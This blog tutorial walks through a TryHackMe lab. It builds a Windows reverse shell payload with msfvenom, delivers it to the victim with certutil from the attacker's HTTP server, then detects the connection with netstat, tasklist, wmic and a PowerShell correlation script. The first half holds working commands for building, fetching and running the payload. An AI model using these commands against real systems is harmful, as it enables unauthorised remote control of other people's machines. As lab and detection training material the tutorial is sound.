Hi, folks. In this post I would like to show you a pretty simple way to create a reverse shell with msfvenom, using a Kali Linux machine and a Windows 7 host. We will run it, establish a connection from the victim host, and then I will show you a few hints on how to detect the malicious process. Let's start!
As a target machine, I will use the TryHackMe vulnerable windowsprivescarena, available for free here. The attacker machine is a Kali Linux distribution hosted on VirtualBox under Windows.
1. Start the victim host and connect using Remote Desktop as the administrator TCM:
The most important piece of information is that the Windows host is x64.
2. Now it is time to create a malicious payload. On the Kali VM, open a terminal and check the IP configuration. I am connected through a VPN, so provide your own interface name:
$ ip -f inet addr show tun0
Create the executable with the msfvenom tool, specifying the target host as our Kali VM IP address and any port, e.g. 8888:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.101.124 LPORT=8888 -a x64 --platform Windows -f exe -o NothingInteresting.exe
3. Now we have to deliver the payload to the target machine. To do so, create a simple HTTP server with Python 3:
$ python3 -m http.server 80
4. Next, go to the Windows 7 VM and download the executable. I prefer using the certutil tool, which is part of the Windows installation:
PS> certutil -urlcache -f http://10.8.101.124/NothingInteresting.exe c:\Temp\NothingInteresting.exe
5. Back on Kali, run a netcat listener on port 8888:
6. To make things easy, I will just run the executable from PowerShell.
Going back to the Kali netcat listener, we find a new connection established between the target Windows 7 VM and our Kali box. This is exactly how a reverse shell works! Now we have a shell as administrator. The firewall was unable to prevent the connection because it was initiated from the victim's host.
So, nice, we have a shell. Now it is time to show you how to detect the established connection.
1. Open PowerShell or Command Prompt on the Windows machine and type:
PS> netstat -naob | findstr ESTABLISHED
or use the -f switch, which shows fully qualified domain names for the foreign addresses:
PS> netstat -f
As you can see, there are two suspicious connections established with an unknown host, 10.8.101.124. I know our executable is talking on port 8888, so let's check it. We have the PID of the process connected on port 8888.
2. Use the tasklist command, filtering by PID (/fi) and listing the modules loaded by that process (/m). Double quotes work in both PowerShell and Command Prompt:
PS> tasklist /m /fi "PID eq 2460"
We have found the malicious executable running.
3. Let's do a last check and open cmd.exe. Using the Windows Management Instrumentation Command-line (wmic), list the parent process that launched the malicious NothingInteresting.exe:
wmic process get name,parentprocessid,processid | find "2460"
Now we can see that the file was launched from the command line, i.e. the PowerShell session we used in step 6.
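The three manual checks above (netstat, tasklist, wmic) can be combined into one script. The following is an added PowerShell example of my own, not part of the original post: it parses netstat -nao, resolves the owning process and its parent for every ESTABLISHED TCP connection via WMI, and flags the rows an analyst would look at first. The user-writable path list and the "common port" list are assumptions to tune for your own environment.

```powershell
# Added example (not from the original post): correlate ESTABLISHED TCP
# connections with their owning process and its parent, the way detection
# steps 1-3 above do by hand. Uses netstat -nao and Win32_Process so it also
# works on Windows 7 / PowerShell 2.0 (Get-NetTCPConnection needs Windows 8+).
# Run from an elevated prompt so every PID can be resolved.

function Get-EstablishedConnectionOwners {
    # Example netstat line: "  TCP  10.0.0.5:49162  10.8.101.124:8888  ESTABLISHED  2460"
    $lines = netstat -nao | Where-Object { $_ -match '^\s*TCP\s' -and $_ -match 'ESTABLISHED' }
    foreach ($line in $lines) {
        $f = $line.Trim() -split '\s+'          # Proto, Local, Foreign, State, PID
        $local = $f[1]; $remote = $f[2]; $procId = [int]$f[4]
        $remoteIp, $remotePort = $remote -split ':(?=\d+$)'   # split at the last colon

        $proc   = Get-WmiObject Win32_Process -Filter "ProcessId = $procId"
        $parent = if ($proc) { Get-WmiObject Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)" }
        $path   = if ($proc) { $proc.ExecutablePath } else { '' }

        # Triage hints (assumptions, tune for your environment): a binary run from
        # a user-writable folder, or a remote port that is not a common service
        # port, deserves a closer look. These are hints, not verdicts.
        $flags = @()
        if ($path -match '\\(Temp|Downloads|AppData)\\') { $flags += 'user-writable path' }
        if (@(80, 443, 53, 445, 3389, 5985, 5986) -notcontains [int]$remotePort) { $flags += 'uncommon remote port' }

        New-Object PSObject -Property @{
            LocalAddress  = $local
            RemoteAddress = $remote
            PID           = $procId
            Process       = if ($proc) { $proc.Name } else { '<unknown>' }
            Path          = $path
            ParentPID     = if ($proc) { $proc.ParentProcessId } else { $null }
            Parent        = if ($parent) { $parent.Name } else { '<unknown>' }
            CommandLine   = if ($proc) { $proc.CommandLine } else { '' }
            Flags         = ($flags -join ', ')
        }
    }
}

# Print all established connections, flagged rows first
Get-EstablishedConnectionOwners |
    Sort-Object { $_.Flags -eq '' } |
    Format-Table PID, Process, RemoteAddress, ParentPID, Parent, Flags -AutoSize
```

On the lab host from this post, the row for NothingInteresting.exe would show the 10.8.101.124:8888 remote address, powershell.exe as the parent, and both flags set.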
Above we saw how to prepare a TCP reverse shell executable with msfvenom, establish the reverse shell connection, and several ways to hunt for the malicious process. We found a process talking on a suspicious port and identified its parent process ID.
If you liked this post, please click the button below, and I will prepare many more interesting topics about common tactics used by SOC teams hunting threats.
Be ethical, and protect your privacy!